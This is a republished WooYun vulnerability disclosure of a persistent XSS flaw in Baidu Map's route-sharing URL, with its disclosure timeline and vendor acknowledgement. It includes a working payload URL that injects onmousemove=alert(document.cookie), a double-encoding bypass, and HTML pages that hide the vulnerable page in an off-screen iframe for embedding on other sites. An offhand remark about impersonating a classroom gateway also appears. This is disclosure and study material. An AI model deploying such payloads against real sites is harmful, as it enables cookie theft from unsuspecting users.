百度地图持久型XSS漏洞

admin
admin
admin
139654
文章
114
评论
2015年5月27日20:57:11评论241 views字数 218阅读0分43秒阅读模式
摘要

2014-08-21: 细节已通知厂商并且等待厂商处理中
2014-08-21: 厂商已经确认,细节仅向厂商公开
2014-08-31: 细节向核心白帽子及相关领域专家公开
2014-09-10: 细节向普通白帽子公开
2014-09-20: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2014-73258

漏洞标题: 百度地图持久型XSS漏洞

相关厂商: 百度

漏洞作者: q601333824

提交时间: 2014-08-21 10:18

公开时间: 2014-10-05 10:20

漏洞类型: XSS 跨站脚本攻击

危害等级: 低

自评Rank: 3

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 反射型xss 持久型xss xss利用技巧

0人收藏

漏洞详情

披露状态:

2014-08-21: 细节已通知厂商并且等待厂商处理中
2014-08-21: 厂商已经确认,细节仅向厂商公开
2014-08-31: 细节向核心白帽子及相关领域专家公开
2014-09-10: 细节向普通白帽子公开
2014-09-20: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

简要描述:

今天老师上课讲到ARP的原理,于是我把我的IP地址改成教室网关地址不知道有没有用.......

详细说明:

1.百度地图存在反射型XSS漏洞,但是被人利用,可以变成持久型XSS漏洞

2.存在XSS的连接

code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24

3.解码之后得到:

code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$

4.上面这个连接

是在搜索驾车路线,添加中途地点那个位置,如图

百度地图持久型XSS漏洞

5.这个地方如果直接在输入框添加代码,再点分享,会因为不存在这个地点出错,返回页面是空的,如图

(1)输入框输入字符串

百度地图持久型XSS漏洞

(2)分享返回页面因不存在这个地点所以清空了。

百度地图持久型XSS漏洞

---------------------------------------------------------------------------------------

6.这个时候可以搜索正确的地点,然后修改参数就不会清空了,如图

(1)搜索正确并且存在的地点

百度地图持久型XSS漏洞

(2)然后点击

分享地点,得到连接

code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSssssssssssssssS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24

(3)然后把上面<!XSssssssssssssssS!>修改成XSS代码,就不会出现清空的情况了,如图

,这里的<span>标签没有对双引号过滤,存在XSS漏洞

百度地图持久型XSS漏洞

------------------------------------------------------------------------------------

7.我自己的猜测的是,那个连接会获取你输入框的地方坐标,当你输入的地方不存在的时候,获取不到坐标,返回错误,又设置了返回错误清空内容,所以我自己猜测,如果事先先填写个对的地方,获取坐标,然后再修改参数就不会有影响

code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$

那些$$$$之间的参数,大概是地图上的坐标(纯属猜测)

---------------------------------------------------------------------------------

9.和上次一样,存在=等于号,就清空,所以编码两次就不会清空

code 区域 
= → %3d →%253d
code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24

8.这个地方XSS,太小,一般人不会去注意,所以创建了两个网页,代码如下

(1)

code 区域 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>中转</title>
 </head>
 
 <body>
     <iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe> 
 </body>
 </html>

第一段代码效果,如图:

百度地图持久型XSS漏洞

(2)

code 区域 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>存储型SS测试</title>
 </head>
 
 <body>
 <marquee behavior="alternate">→→→→→→→→→→<iframe src="http://fripside.sinaapp.com/1.php" width="50" height="30" scrolling="no"></iframe>←←←←←←←←←←</marquee>
 </body>
 </html>

配合第一个网页,第二段代码效果,如图:

百度地图持久型XSS漏洞

9.上面两个代码的,说简单点就是,第一个网页,调整XSS位置和大小。

第一个网页iframe设置了绝对位置,不能随便移动,但是可以第二个网页设置嵌入第一个网页,就可以随意调整位置

10.最终效果,可以访问这个连接看效果,我设置了滚动效果,可以被人挂在网站当按钮使用

code 区域 
http://fripside.sinaapp.com/2.php

11.最终效果图

百度地图持久型XSS漏洞

漏洞证明:

(1)

code 区域 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>中转</title>
 </head>
 
 <body>
     <iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe> 
 </body>
 </html>

(2)

code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$

0

(3)最终效果图

百度地图持久型XSS漏洞

(4)可以访问这个连接看效果

code 区域 
http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$

1

修复方案:

过滤

版权声明:转载请注明来源 q601333824@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-21 16:52

厂商回复:

感谢提交,我们立即联系业务部门处理此问题。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-08-21 10:30 | 疯狗 百度地图持久型XSS漏洞 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    0

    能定位乌云峰会的酒店,然后就弹出“9月12日我们不见不散哦”

  2. 2014-08-21 21:05 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    0

    you what is so diao(斜眼

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin